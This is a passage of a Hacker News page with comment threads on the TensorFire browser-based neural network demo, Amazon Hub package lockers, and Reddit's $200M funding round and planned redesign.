baalimago 4 days ago 1 reply      
Didn't know "var" was outdated. Good stuff, thanks!
minademian 4 days ago 0 replies      
this looks promising. I like how it teaches the concepts using plain Javascript without focusing on a tool or library. Kudos.
Show HN: TensorFire tenso.rs
500 points by antimatter15  20 hours ago   76 comments top 39
antimatter15 19 hours ago 6 replies      
Hey HN!

We're really excited to finally share this with you all! This is the first of a series of demos that we're working to release this week, and we're hoping you'll keep us to that promise :)

Sorry if it doesn't work on your computer! There's still a few glitches and browser compatibility problems that we need to iron out, and we're collecting some telemetry data with LogRocket (https://logrocket.com/) to help us do so (so you all know what kind of data is being collected).

We'll open source the library under an MIT license once we finish writing up the API docs, and fixing these bugs.

danicgross 18 hours ago 1 reply      
TensorFire was a finalist of AI Grant. Applications for the next batch are open now! Get $2,500 to work on your AI project: https://aigrant.org.

It should only take five minutes or so to apply.

zitterbewegung 19 hours ago 1 reply      
Really cool demo. How does this compare to https://github.com/transcranial/keras-js ? Do the authors have a licence in mind?
mholt 18 hours ago 1 reply      
This is amazing. I can't use GPU Tensorflow (natively) on my Macbook Pro because it doesn't have an NVIDIA graphics card. But I can... in the browser! Honestly didn't see that one coming.
smaili 18 hours ago 0 replies      
Well done! Also important to note this project is one of the 10 recipients of the Spring 2017 AI Grants[1].

[1] https://aigrant.org/#finalists

motoboi 19 hours ago 2 replies      
Could someone explain what is going on here? What are the steps? Why do those colorful artifacts appear before the final result?
rjeli 13 hours ago 0 replies      
Really cool - just want to point out that the flashing rectangles might trigger seizures in people with epilepsy. I'm not sure if they're intended, but on Chrome on Linux I get a bunch of brightly colored rectangles flashing for a single frame before the result. Might want to disable that or put up a warning to avoid an accident.

That said, well done, very impressive project!

nametube 19 hours ago 1 reply      
"running networks in the browser with TensorFire can be faster than running it natively with TensorFlow."

Could you elaborate on this statement? What kinds of architectures does this hold true for?

caio1982 19 hours ago 0 replies      
Kudos for providing a minimum experience on mobile! I was afraid I would have to wait until I got home :-)
martinmusio7 6 hours ago 0 replies      
Whenever I click on an image in the lower left corner it compiles the kittens. It shouldn't be like this, right? The NN is supposed to use the example I'm choosing. (?)

And, as everyone else mentioned already: f*ing wow!

hughes 16 hours ago 2 replies      
Hmm, this seems to lock up & crash my whole browser (Chrome 59, windows, nvidia graphics) when I try to run any of the examples. It gets past Downloading Network, then gets about 5% through Compiling before getting stuck.
hackpert 8 hours ago 0 replies      
Inference speed looks brilliant. Eager to read the source!

(Also, somehow I had a feeling before even reading that this project was by the people who made Project Naptha etc. Have you written/talked about this anywhere earlier?)

fabian2k 18 hours ago 1 reply      
I've played around with doing some computation in WebGL, but it was rather tedious and difficult with my limited knowledge of the topic. It's possible, but you can't even rely on floating point textures being available on all systems, especially mobile. And for anything more complicated, you probably need to be able to render to floating point textures, which is even rarer than support for plain floating point textures.

This only makes it more impressive when people do cool computational stuff in WebGL, but I'd wish there were some easier ways for non-experts in shader programming to do some calculations in WebGL.

realworlddl 8 hours ago 0 replies      
Nice demo! I made a shop where you can buy images like these (www.deepartistry.com). Would be happy to see more designs coming in.
dizzy3gg 7 hours ago 0 replies      
So I could build a model using the Google Detection API then do the actual inference within the browser?
tambourine_man 16 hours ago 2 replies      
Didn't work here, just a bunch of colored squares on Safari, Chrome or Firefox. The latter actually managed to hang my machine. I could ssh to it but kill -9 wouldn't terminate Firefox. Had to force reboot the machine, haven't done that in years.

Amazing and scary, this WebGL thing is.

iMac 2011, latest OS

Edit: worked on MacBookAir

Dowwie 13 hours ago 0 replies      
It is with great pleasure that I may present to you, Denali:


sonofaragorn 18 hours ago 0 replies      
This is really cool! Great work!

I wanted to download the resulting image but got a "Failed - Network" error :(

fletchowns 16 hours ago 1 reply      
I get an SSL error SEC_ERROR_UNKNOWN_ISSUER when I try to load this page. I tried removing https from the URL but then it's blocked by OpenDNS with message "This domain is blocked due to a security threat"
batmansmk 18 hours ago 0 replies      
This is awesome!

Quick question: is the code compiled from js to webgl in browser as well, or do I need to compile beforehand?

I see this as a great way to learn and teach AI without having to bring a large toolchain.

Edit : it seems it is just a runtime for now for Tensorflow models!

uyoakaoma 18 hours ago 0 replies      
Failed when I uploaded an image

>> framebuffer configuration not supported, status = undefined

iXce 18 hours ago 1 reply      
> as fast as CPU TensorFlow on a desktop

> You can learn more about TensorFire and what makes it fast (spoiler: WebGL)

Does this mean that using a GPU in a browser through WebGL yields the same speed as a desktop CPU?

jstsch 19 hours ago 0 replies      
Seriously cool. Great work. I did get a glitch every now and then in the rendered output (say 1 out of 5 times) using Safari 10.1.2, MBP touchbar 2016 15", Radeon Pro 460 4096 MB.
shams93 12 hours ago 0 replies      
This would be an interesting way to generate a self-updating blog or an automated news site.
arnioxux 19 hours ago 1 reply      
Is the end goal to allow people to donate computing power for training? (a la Folding@home or SETI@home except just by visiting a webpage)

If so that's amazingly clever!

narrator 19 hours ago 1 reply      
I guess WebGL is now the "good enough" cross-platform vendor neutral replacement for CUDA.

Tensorflow should add a WebGL backend that runs in NodeJS.

cpcarey 17 hours ago 0 replies      
Amazing work! That was incredibly fast (2013 MBA 13" 1.7 GHz i7, Intel HD Graphics 5000 1536 MB, Chrome 59).
udia 16 hours ago 0 replies      
Lots of potential here. Looking forward to seeing the source once it's released.
jacquesm 16 hours ago 0 replies      
Awesome demo. Happy to report it works without a hitch on Firefox/Ubuntu.
fulafel 19 hours ago 0 replies      
Very nice to see webgl gpgpu apps, they have been slow in coming. Any plans for webgl 2?
ruste 17 hours ago 0 replies      
Nice, Leonid Afremov is a great choice of input art.
aluhut 17 hours ago 0 replies      
Respect. This pretty much killed the PC I'm on now. Wasn't even able to get to the task manager :D

Windows7, Firefox 54(64bit)

ccheever 17 hours ago 0 replies      
This is amazing. Very cool.
draaglom 19 hours ago 0 replies      
This is really cool!!
gilbertstein 8 hours ago 0 replies      
is there a way to download and play with it?
cs702 19 hours ago 1 reply      
Where is the repo?
setgree 17 hours ago 0 replies      
I love it
zo1 18 hours ago 1 reply      
>"Could not initialize WebGL, try another browser".

Happening in both Firefox and Chrome on Ubuntu. What exactly am I missing here?

synt 13 hours ago 1 reply      
hey, stop it.

i'm running 55.0b13 (64-bit) firefox on windows 10 and clicking on that demo froze the browser, froze my box - hard reboot.

whatever you're doing some of it's wrong. bad wrong.

Amazon Hub amazon.com
431 points by danial  4 days ago   331 comments top 60
Balgair 4 days ago 16 replies      
Oh wow, I guess the company at my old Apt complex got bought out. Those racks are the exact same.

Still, those were terrible ideas. FedEx, USPS, and UPS all just dropped the boxes off at our door. The others made us use those machines. It wasn't too bad to go down and get the packages. Oh wait, then you forgot your phone and had to go all the way back up to get it, to get the unlock codes from your email. Then you had to be certain that your email would not send the code email into spam, so that sucked.

But if you were out of town or on vacation or just stressed from work or had a spam email mis-identification then it was a spawn worse than Satan. The system started to charge you, like $5/day or something, for non-picked-up packages after like day 3. Guess who got a nasty surcharge after spending a month away for work, with no email to tell me that things would get surcharged? Yeah, $150 for some random thing my sister sent me unannounced was not a lot of fun.

And no, the apt complex signed onto this AFTER we moved in and with no notice on the lease or an update to us. I did get the complex to pay that crazy fee after storming in one morning and yelling a lot. Idiots.

As long as there is no charge for packages that don't get picked up and no 'max time' it can sit in a robo-bin, these things work great. If there is any charge at all, in any way whatsoever, avoid them like the plague, they are horrible.

nihonde 4 days ago 3 replies      
As is so often the case, this is already a solved problem in Japan. When a package arrives, I'm alerted to its presence when I RFID my key to open the lobby door. Then I RFID my key again on the package locker and the locker with my stuff pops open.

The issue with lockers filling up too quickly or packages sitting in them too long is handled by the shipping company, which has sufficiently good customer service to contact me about re-delivering items that aren't reaching me. Also, my neighbors would be mortified if their deliveries ever inconvenienced someone else in the building, so it's somewhat self-policing in that sense.

The amount of over-engineering that goes into overcoming the shortcomings of customer service and lack of basic etiquette in America is amusing and sad. Amazon seems to be an emerging leader in finding solutions for social breakdowns that could be easily solved if people cared more about doing a good job or about extending basic courtesies to their fellow citizens.

veridies 4 days ago 7 replies      
This morning, an Amazon deliveryman walked a few steps toward my house, threw a package about fifteen feet to the door (denting the case inside), and then walked back to his van. I still can't find a specific way to complain about the delivery. Forgive me if I'm not excited about Amazon building their own private mailboxes, but I don't think they have any real understanding of their own shortcomings.
cbhl 4 days ago 3 replies      
The biggest problem with this is that packages are bursty -- your mail room is always bursting around Christmas time.

I saw one apartment complex this year that had a twist on the package robot concept -- there's an iPad at the door of the mail room, and you type in the code from your package, the iPad takes your photo and then unlocks the mail room door using a solenoid.

The UPS guy? Scans the barcodes on the packages, then wheels them in and drops them off on cheap metal shelves inside -- no need to pay an employee to manage the mail room 24/7. More residents/packages? Just buy a few more shelves. Resident wants to pick up a package as soon as Amazon buzzes them? No problem. Resident wants to pick up at 2am? Great.

The only problem is you have to trust your neighbors to not steal your packages.

ohyes 4 days ago 0 replies      
I had something like this at an apartment I lived in, it was called 'package concierge.'

It was mostly nice, but where I lived there were issues with execution of the idea. At peak times (holidays) the package robot would get full, because people wouldn't pick up their stuff in a timely manner.

The package robot also had to be loaded by an employee of the building... until then the package hung out in the mail room like normal, but you could only get your package from the package robot... so if the package showed up and no one was around to load the robot, or was slacking off on loading the robot, it actually took longer to get your stuff.

When it worked, however, it was good to be able to pick up your package when you got home from work at midnight without having to talk to anyone or sign anything. Also getting notified via email that you had something waiting was nice.

polskibus 4 days ago 6 replies      
Been using InPost Paczkomaty for ages. https://twoj.inpost.pl/pl/przesylki/paczkomaty

Established in 2006, it helped bring down the cost of deliveries and at the same time improved the convenience of online shopping, back when DHL etc. always wanted to come to your flat while you were at work.

netinstructions 4 days ago 5 replies      
Was kind of hoping this is something individual home owners could install near the front door so packages aren't left on the steps.

If you fill out the form it asks what kind of property you have, and single family homes is an option, but then it says "your property does not meet our requirements at this time." I wonder if enough people select that though...

clvcooke 4 days ago 4 replies      
Looks like Amazon picked up the buffer box [1] idea. Such a shame Google bought them and shut them down, it had such potential.

[1] https://en.wikipedia.org/wiki/BufferBox

bastijn 4 days ago 1 reply      
In NL you can have your package delivered to a drop-off point near your house. Usually these are supermarkets or other kinds of shops. I always pick my local supermarket, which is on my way home anyway. It is open until 22.00 on working days, so no issues there.

It is not like this Amazon box, but it also doesn't have the other things to worry about (packages arriving on holidays and costs surcharged thereafter). The shops get a little extra earnings and they handle sending things back etc. when not picked up. The service is free of charge for customers.

I guess the Amazon box would be a tad more convenient to go to, as they are at your doorstep (every single building seems to be their intention, though I didn't really get that from the site), but to be honest, you are visiting your supermarket anyway. At least in NL, where they are close. The US might be a bit different here due to distance? Though you can use other shops as well, and usually there is one within say 1-2 km.

sumitgt 4 days ago 8 replies      
My apartment uses LuxerOne (https://app.luxerone.com), and it is the best amenity IMO.

One problem of Amazon Hub vs. LuxerOne is that I don't think Amazon Hub will work with packages from other retailers.

rtpg 4 days ago 4 replies      
I get that the post office as a whole is useful, but on an organizational level it probably would make more sense for everyone to have to go to the post office to pick up their deliveries in this day and age.

Personal delivery to your doorstep is a pretty luxurious service, if you think about it in the abstract. Plus it seems inefficient for these delivery people to go to a bunch of people's houses and drop things off (when people are mostly not home) when we could all just change our daily commutes slightly when we need to.

crashedsnow 4 days ago 0 replies      
We have a security gate and I installed a network-enabled lock for which I can remotely add temporary security codes that we then specify in the order from Amazon. This results in the UPS guy completely ignoring it and leaving the package outside the gate in plain view for package thieves. Delivery drivers are like cab drivers used to be before Uber/lyft. There's no accountability baked into the process. Someone please invent Lyft for deliveries.
creo 4 days ago 1 reply      
We have that in Europe for years. It works great for me. There is no communication struggle with anyone nor planning involved and its cheaper. You'll get phone message and mail that there is package to take and from that moment you have 48 hours to pick it up. If you don't do it within time limit, package gets back into warehouse so you can go there or request home delivery for few euros.
quantumwannabe 4 days ago 0 replies      
This just looks to be Amazon Locker[1] for apartment buildings. I've seen the lockers in hotels and around town for several years.

[1] https://www.amazon.com/b?node=6442600011

dcw303 4 days ago 1 reply      
My apartment in Tokyo has a similar system, and the apartment before that. I'd guess that most modern buildings within the 23 wards have it too. Don't know about other cities. You use the same electronic key that you need to get into the building foyer.

All domestic delivery companies (Kuro Neko, Sagawa, etc.) will drop into them without a second thought. FedEx is a bit more annoying in that you have to call ahead and authorize them to use a bin, but that's ok.

I only have trouble with some things through Japan Post where a signature or ID is required, which is annoying but understandable when they are delivering something like a credit card.

Nition 4 days ago 1 reply      
"You can pick up any package" says the video while showing a whole sequence of packages of roughly the same dimensions.
revelation 4 days ago 1 reply      
Looks like a Packstation:


They are nice, but it's a bit of a trade-off: 50% chance there is an empty opening in the station, 50% chance it's full and they dump the packet at some service center miles away where you stand in line for half an hour and get your package late.

smpetrey 4 days ago 0 replies      
As a person who regularly commutes from Brooklyn to Manhattan for work, I'm never home to accept my Amazon deliveries. To make matters worse, the local UPS, FedEx and USPS offices always "lose" my package, only to have it either never show up or be re-delivered weeks later with no notification.

Why don't they just leave it in vestibule or on my doorstep? Thieves. All delivery carriers just plain refuse to leave packages unattended.

This solution is basically an Amazon locker or PO Box that lives in my lobby? Sounds awesome. Amazon Hub might not make sense in rural areas but Amazon's biggest target lives in urban areas. I'm so ready for this.

alecco 4 days ago 1 reply      
This model doesn't work already.

I ordered some PC parts to an Amazon Locker and got my Amazon account suspended indefinitely. I can't log in to it. But they didn't block the other half of the order, which didn't make any sense to get on its own (a case).

They asked for my credit card billing statements via fax (shrug). After struggling with my hotel's terrible computer and fax, I managed to send it to them. No answer. I asked, and only then did they respond, in a short email, that it was not legible. Terrible support.

Also the delivery of the case was delayed several days so I lost it but had to pay for it anyway.

They managed to make me never buy from Amazon again. My account was over 10 years old. Had problems with deliveries a year ago, too. (that was why this time I tried an Amazon Locker)

primigenus 4 days ago 1 reply      
Hopefully at some point in the future apartments/houses just come with privileged access entryways that you can manage, and delegate time-gated access to delivery services. That way the delivery person can just let themselves into your "airlock", put the package there, and leave without getting undue access to your private home and without it being a public space (like a porch) that requires a social contract to not be broken in order to remain secure.

Today's too early though, since IoT (eg. a connected doorlock) seems untrustworthy. What are some solutions that could be used to approximate it, I wonder?

wanghq 4 days ago 0 replies      
Lesson learned: if you have some idea, buy a domain name, put up one static page to explain the idea, and use a form service to collect feedback :)

It's interesting to see that amazon doesn't mind using a 3rd party form service to collect information (https://amazon29.au1.qualtrics.com/jfe/form/SV_8nWssUBen1xjL...) even though they have enough tech power to do that.

erickhill 4 days ago 0 replies      
I wish my office's building was able to support one of these. Our neighborhood USPS will often swing by after the office doors lock. They will say things like "unable to deliver" but never deliver during office hours. When you buy from Amazon, you never know if UPS (never a problem) or USPS is going to be the deliverer. It makes Prime shipping nearly worthless for many of us.

But we don't own this building, and at least right now I can't imagine where one of these things might go.

bschwindHN 4 days ago 0 replies      
Here's a video demonstrating this kind of system in Japan:


The cool thing is when you scan in with an IC card, the lobby door will notify you of the package. That same IC card also lets me unlock my door and open the delivery locker. There's also a panel in my room which lights up when a package is sitting in the locker for me.

jk2323 4 days ago 1 reply      
Old news. They have this already in China, and they have something similar in Germany. In fact, AFAIK they even had something like this in the former GDR.
losteverything 4 days ago 0 replies      
It says from any carrier.

To receive from the USPS, among other things, you must have an address, an approved mail receptacle and a safe and secure location.

The "space" in the mailbox is protected and is virtually owned by the usps.

I could not deliver to a box that is not postal approved. I suspect the missing piece of info is that an agent would have to place a parcel into a Hub locker, like the UPS Store does today.

43224gg252 4 days ago 2 replies      
So... a mailbox?
plumeria 4 days ago 0 replies      
Who do they charge for this service? The retailer, the delivery company, the landlord, or the end consumer?
ikeboy 4 days ago 1 reply      
I'm hopeful this will improve deliverability - amazon sellers have noticed recently an increase in items returned because "shipping address undeliverable", and amazon forces us to eat the shipping cost - often on items delivered by Amazon themselves (amazon logistics).
djhworld 4 days ago 0 replies      
I suppose if you live in a block of flats, this would be useful.

I tend to use Amazon Lockers a lot anyway, there's one just outside my tube station (Transport for London let Amazon put one there, which I thought was smart)

otto_ortega 4 days ago 0 replies      
I got a chance to try Amazon Lockers recently while on a trip in Seattle, I can't say anything but good things.

It is very convenient not having to worry about whether there will be someone home when they try to deliver your package, or that they might just drop it somewhere and it could get lost (especially if it is something expensive).

At least with Amazon Lockers they give you 3 days to pick up the package, returning it after that. I assume they can do something similar with these: after 3 days, packages are returned to the nearest carrier retail outlet.

eli 4 days ago 0 replies      
Seems like UPS Access Point and whatever the equivalent FedEx program is called already mostly solve this for me.

If I'm not home, UPS leaves the package at a nearby participating business (which you can select from a list online if you wish). I picked a check cashing place that's already on my walk home. It's free and they'll hold packages for something like two weeks.

I guess YMMV if you're not in an urban center.

paulcole 4 days ago 0 replies      
They could OCR all the return addresses and figure out who's buying what and target ads accordingly. They could also x-ray all the packages for even more insight into consumer behavior. And if a package is coming from a competitor, offer the recipient the option to receive an Amazon gift card in exchange for refusing delivery and returning to sender. Or just paste Amazon ads all over every package in the Hub. Yes I work in marketing why do you ask.
madamelic 4 days ago 2 replies      
I am kind of waiting for the day Amazon gets hit with an anti-trust or something.

Amazon is nice, but I'm a bit tired of Amazon's attempts to collect everyone's data about everything.

justicezyx 4 days ago 2 replies      
Amazon is reinventing the whole daily retailing experience piece by piece.

There does not seem to be anyone on the market now who can be a meaningful competitor at all. The closed-loop virtuous cycle now extends to a degree that probably only Alibaba can rival (in China).

I don't think this was Bezos' original vision, but Amazon has grown to a point where such ideas just come out naturally.

Resistance seems futile now; all retailers should consider how to operate in the model created by Amazon.

gist 3 days ago 0 replies      
Where this will end up is that Amazon will figure out a way to put these at private residential homes [1] and the property owners will be able to earn extra cash. Won't work in all places or on all types of properties but I can definitely see it being possible in certain locations.

[1] After figuring out how to defeat any zoning issues.

glenneroo 4 days ago 0 replies      
What's wrong with the "pick-up stations" option? I have a list of 9 different places (post office, gas station, optician, pizzeria, drug store, etc.) within 15-minute walking/transit distance which I can select to have my stuff delivered. Alternately I can enter a neighbor's name/address or select a safe place. Is this only an option in Europe?
tapmap 4 days ago 0 replies      
Isn't there a startup out there that will pick up your packages for you when you're out? Or will allow your neighbour to pick them up?
voltagex_ 4 days ago 0 replies      
AusPost has Parcel Lockers which are fantastic, except they won't accept courier deliveries, only "standard" packages (USPS, Royal Mail, Auspost itself). I get a push notification and an SMS. There's a QR code in the app which is used to open the door to the locker.

Strangely, I got two DHL packages recently so maybe they've changed the rules.

samcat116 4 days ago 0 replies      
We have had a similar product at my university for the past two years. I honestly couldn't imagine college without it. I have little faith that my residential office could manage that many packages. Plus free next-day pickup for most things on Amazon is amazing. Order by 10pm and it's there at 8am the next day.
chiph 4 days ago 0 replies      
I'm wondering how anti-theft these are. I (and my neighbors) just lost some mail because some thieves pried open the cluster mailbox. I imagine these would be a really attractive target.
jageen 4 days ago 0 replies      
Rakuten introduced the same kind of service in 2014, where you can set your own password to unlock the box.


19890903 4 days ago 0 replies      
There aren't enough companies doing USEFUL hardware. To see such a handy tool from Amazon is a breath of fresh air. What are some useful hardware companies that you can think of?
Nerada 4 days ago 1 reply      
Pretty much Australia Post's Parcel Lockers.


TranquilMarmot 4 days ago 0 replies      
Isn't this just Amazon Locker? There are ton of them here in Seattle, one right next door to me. Biggest issue is the thing is ALWAYS full so I can never actually get anything shipped to it.
alexobenauer 4 days ago 2 replies      
Wildly unnecessary. Apartment complexes have mailbox systems where they leave a one-time key in your mailbox to a special package-sized box. No touchscreen or Amazon needed.
devdoomari 4 days ago 0 replies      
well there's a convenience-store version of this in Korea...

which is a +1 for the convenience store (more people coming in -- more chances to sell stuff) and +1 for the buyer

sixQuarks 4 days ago 1 reply      
Amazon needs to solve the cardboard box overload issue. Too many boxes to break down all the time, and sometimes overfilling the bin.
empath75 4 days ago 1 reply      
Every apartment I've ever lived at just has deliveries left at the leasing office. It seems like it works fine.
chw9e 4 days ago 0 replies      
If these things supported refrigeration it would be pretty convenient for future deliveries from Whole Foods
banach 4 days ago 0 replies      
Oh, they mean a "mail box".
cargo8 4 days ago 2 replies      
Is this just Amazon Locker rebranded?
felipesabino 4 days ago 0 replies      
[off-topic] Anyone else really annoyed by the buggy scroll making the page jump up and down?
quickthrower2 4 days ago 0 replies      
My solution is to tell them to leave it round the back, under the verandah
arxpoetica 4 days ago 0 replies      
Something like this for international shipments would be awesome.
odiroot 4 days ago 0 replies      
I think we already have it here in Germany, if I understand correctly. DHL is always experimenting with new ways to avoid ringing your doorbell.
homero 4 days ago 0 replies      
How's it get your email?
e40 4 days ago 0 replies      
Not new, and I tried to use it several times, and the boxes at the 7-11 near my house are never free.
orliesaurus 4 days ago 0 replies      
What's next? Amazon Buses to get you to work?
2_listerine_pls 4 days ago 0 replies      
I hate Amazon. These guys want to control every aspect of the chain.
nightski 4 days ago 2 replies      
Wow that looks like an example of over engineering if I have ever seen one. USPS has been using a simple key system for ages.
Reddit raises $200M at a $1.8B valuation recode.net
383 points by snew  22 hours ago   395 comments top 47
stevenj 21 hours ago 46 replies      
>the company is literally re-writing all of its code


>An early version of the new design, which we saw during our interview, looks similar to Facebook's News Feed or Twitter's Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

>"We want Reddit to be more visually appealing," he explained, "so when new users come to Reddit they have a better sense of what's there, what it's for."

I fear this major re-design will be a mistake. HN is designed similarly to Reddit and if HN ever tried to do a major re-design, I think I would visit it less. I keep coming back to it because of its stories, comments, and its simplicity and minimalism. It has good content and is very easy to use and navigate.

t0mbstone 19 hours ago 5 replies      
If you are going to re-design a site like reddit, your best bet is to keep the old version in place, but allow people to also view all of the same content in the "new" design.

For example, release the new design on new.reddit.com and let viewers migrate over to it at their own pace.

Once you have a lot of people using the new reddit instead of the old design, you can migrate the old reddit to old.reddit.com and put the new design up as the default.

WHATEVER YOU DO, DON'T GET RID OF THE CURRENT DESIGN, until you have adoption for the new design. Period. If you simply replace the old with the new, reddit is as good as dead.

koolba 21 hours ago 6 replies      
> Still, he says making money is not our top priority, estimating the company spends only about 20 percent of its resources on its advertising business. Huffman declined to share revenue totals. The company is also not profitable.

I can't imagine giving $200M to a group of people who publicly say they're not focused on ensuring I get it back. Is this a VC investment or a charity?

Also, have they not achieved profitability after 10+ years because they don't know how to make enough money (i.e. ad sales team is weak), costs are too high (i.e. bad code so lots of infra or too many employees), or is it just not possible to be profitable in this space?

Chardok 20 hours ago 2 replies      
I am of the opinion that trying to turn a profit on something like Reddit is a catch 22.

The concept of Reddit, which is user generated content curated by users, doesn't have a lot of need for a middleman, more of just a few moderators and admins to keep everything running smoothly. The power of the website is solely in its users and their content generation.

Unfortunately these slow changes have been eroding what were Reddit's strengths of free speech and open dialogue by making the site "advertisement friendly". That means killing all subreddits that could sour potential buyers and altering vote counts to favor specific messages.

Combine this with the fact that they are planting viral marketing disguised as user posts (one from today, even! https://www.reddit.com/r/gaming/comments/6ql2tu/made_my_deli...), allowing blatant vote manipulation (https://www.forbes.com/sites/jaymcgregor/2016/12/14/how-we-b...) or allowing entire takeovers (/r/politics during the election cycle - hello CTR!) and you have a bloated replica of something that used to be an amazing socially powered website.

rdtsc 11 hours ago 6 replies      
I don't understand this. Anyone remember a time when companies used their developers to update their site without having to raise hundreds of millions of dollars?

> An early version of the new design, which we saw during our interview, looks similar to Facebook's News Feed or Twitter's Timeline:

So they will look like Facebook. Because nothing says cool and trendy like the social site your parents and aunts and uncles use. Now nothing wrong with aunts and uncles using the site, it's just that "fresh" and "cool" aren't exactly the first things that come to mind there.

> The company has about 230 employees, up from around 140 at the beginning of the year. Huffman would like to end 2017 with around 300 full-time staff.

That sounds odd to me as well; maybe I am not versed in startup culture. Having a goal of going from 230 to 300 people seems like a pointless metric (and wasteful). It's like saying "I want to write 1000 lines of code today".

I haven't seen much mentioned about moderation and admins and how they censor and manipulate content and talk about fostering better communities and so on.

> Eventually, though, Altman and Reddit's other investors will want their money back and then some. Huffman says there are lots of ways for Reddit to exit, none of which he's focused on at the moment.

Well there is the answer. They are trying to sell it. "Hey, psst! Wanna buy this cool site for $2B? It looks fresh like Facebook, and we just grew by 30% (230 to 300 employees) in the last few months. Close your eyes and imagine that hockey stick graph going up, and the value you'd be getting out of it".

SirensOfTitan 18 hours ago 3 replies      
Within the context of redesigns I think there exists some value in looking at Facebook's failed card-based redesign back in 2013:


Essentially this big, beautiful, design-driven redesign ultimately never shipped because users spent less time on it. Certain design 'improvements' like increased padding between stories reduce density and as a result tend to reduce readership, for example. The internet as perceived by engineers and designers is quite different from the masses (even with Reddit's demographic differences from FB taken into account).

Reddit needs to be really careful with a redesign: data should lead the rollout efforts, not design. I think they are due for some UX improvements, perhaps around a gradual UI refresh; however, I have little faith in the product leadership at Reddit to pull this off. Huffman and crew need to be willing to can the entire redesign if user research and data come back negative.

huebnerob 21 hours ago 2 replies      
Frankly, I love Reddit. If you pick and choose the right communities, it can be an amazing resource for everything from tech discussions, to local news, to emotional support. However, I will strongly agree there is a perception problem: there's also a lot of bad on Reddit, and its structure as a series of echo chambers doesn't help.
arca_vorago 19 hours ago 0 replies      
Good. It's about time for Reddit to wither enough for a more user-focused platform to take its place.

It's the ol' model I see time and time again. A site pulls in users by being generally awesome and doing things like not advertising, not censoring, etc. Then the site grows. Businesses start astroturfing because they can't advertise. Then the company slowly starts walking back everything that made it special, for example on advertising, all while rapidly expanding the personnel while hardly doing anything to improve the site for users. Aaaand right when advertising dollars are at their best, they try to capitalize or take it public, followed by a big sale/buyout, and finally within finite time users feel betrayed and it withers and dies, but not before a competitor starts where they did, and usually follows the same path.

I stopped participating in Reddit about the time sockpuppetry really started killing my favorite subs, and personally I think the first and most grievous mistake was moving away from text only.

The problem as it stands is that none of the competitors stand out. I think HN is best, but its scope is limited; /. did some interesting things but failed and lost its user base. Voat is too much of a Reddit clone, and I just don't get the appeal of Steemit etc.

Personally, I think we need to sit down and figure out a better way to measure user worth. Right now I am leaning toward a Slashdot-style moderation/tagging system, along with limited input per user at varying thresholds. Something that really interests me is automating logical maps of comments too.

asb 20 hours ago 4 replies      
The announcement on Reddit also says they are changing their privacy policy to remove support for 'Do Not Track' https://www.reddit.com/r/announcements/comments/6qptzw/with_...
annexrichmond 21 hours ago 0 replies      
> Huffman's plan for the new funding includes a redesign of reddit.com - the company is literally re-writing all of its code, some of which is more than a decade old. An early version of the new design, which we saw during our interview, looks similar to Facebook's News Feed or Twitter's Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

This sounds risky for a couple of reasons. I hope it is a bit hyperbolic and they are only referring to the frontend. But anyway: rewriting everything from scratch is a monumental undertaking and can delay other important enhancements. Rewriting everything partially contributed to Netscape falling behind its competitors [1] and eventually to its irrelevance. The other reason it is risky is that maybe the site's simple and functional design is what made it so successful in the first place?

[1] https://www.joelonsoftware.com/2000/04/06/things-you-should-...

virtualized 21 hours ago 3 replies      
But.. but I began to like Reddit. Now they want to take it away from me by destroying it.

> It's going on a hiring spree


> redesigning its website

For no reason other than giving the unnecessary people from the hiring spree something to do.

> Huffman would like to end 2017 with around 300 full-time staff

The current number of 230 employees is already about ten times too many. What the hell do they need the additional staff for?

> The company is also not profitable.

Doesn't need to be because it could be run by ten people living off of donations.

wiremine 21 hours ago 1 reply      
Seen a few comments focus on the "redesign" and comparisons to Digg, and wanted to add a few comments:

1. People may forget, but Reddit was a (the?) major winner in the Digg exodus.

2. I don't think Digg ever got the subreddit-style discussion boards down. I find the Reddit "homepage experience" and the typical subreddit experience to be very different. Should be interesting to see which way they slide for the redesign.

3. The influx of new capital and the focus on the redesign sort of telegraphs that they want to grow reddit, which is a very large but idiosyncratic community.

If they do it right, the change will be very transparent and very incremental, a la the eBay background color change [1].

Should be an interesting thing to watch!

[1] https://articles.uie.com/death_of_relaunch/

cleansy 21 hours ago 3 replies      
I would love to see Reddit be more like Wikipedia than Facebook. If they cut out the sales team and asked for donations like WP does, they would do just fine. I was on Reddit before I was registered on FB, and quite frankly I love reddit.com way more than FB for many reasons. It's a shame that they're going down the hypergrowth-unicorn path.
spike021 21 hours ago 2 replies      
>An early version of the new design, which we saw during our interview, looks similar to Facebook's News Feed or Twitter's Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

Not sure why this UX concept needs to be applied to every kind of interface nowadays.

I think Reddit's current interface could be updated visually without changing its simplicity.

bionoid 6 hours ago 0 replies      
Looking past the visual design, I think a more pressing question is what will happen to the API? From my perspective, it is Reddit's saving grace. It bridges the gap between available functionality and what moderators and users actually need. I personally run about ~30kloc of Python code against Reddit 24/7, mostly to aid moderation of subreddits. This codebase has grown organically over the years, and truth be told, a major API change will require a major investment on my end. That is my own fault, for sure, but I know several other developers in the same boat.

Breaking the API will take away essential functionality from a very wide range of communities, moderators and users alike. Can they do a complete front- and back-end rewrite and still maintain a backwards-compatible API? If not, I am out, because a rewrite is simply way too much work.

edit: typo

vlunkr 10 hours ago 1 reply      
Honestly, how do you monetize Reddit? I'm curious what ideas they supposedly have. The crowd is too tech savvy to just throw more ads on it. They run ad blockers, and if you get aggressive like news sites do, the exodus will begin. It just seems like a community with little loyalty to the site itself, and distrust of obvious commercialization.
Invictus0 19 hours ago 0 replies      
I couldn't imagine a more futile investment. Reddit users are notoriously combative. Ads on Reddit have extraordinarily low CTRs. After bumbling around for the last ten years, Reddit still doesn't know dollars from doge and is burning cash on ridiculous side projects like its gift exchange and its (already discontinued) entrepreneurship mini-series.
naturalgradient 21 hours ago 0 replies      
I hope this redesign does not turn into a LinkedIn-style disaster. Sometimes I wonder if these redesigns happen not for some well-argued business purpose but because overinflated departments have to justify their existence (which I strongly suspected in the case of LinkedIn's redesign, which made the site unusable for months).
aerovistae 12 hours ago 0 replies      
strgrd 19 hours ago 0 replies      
Reddit, after the great Digg exodus:

> You chose to grow with venture capital and you've no doubt (I hope) taken some money off the table in your Series C round. I say this because this new version of Digg reeks of VC meddling. It's cobbling together features from more popular sites and departing from the core of Digg, which was to give the power back to the people.

lettergram 20 hours ago 0 replies      
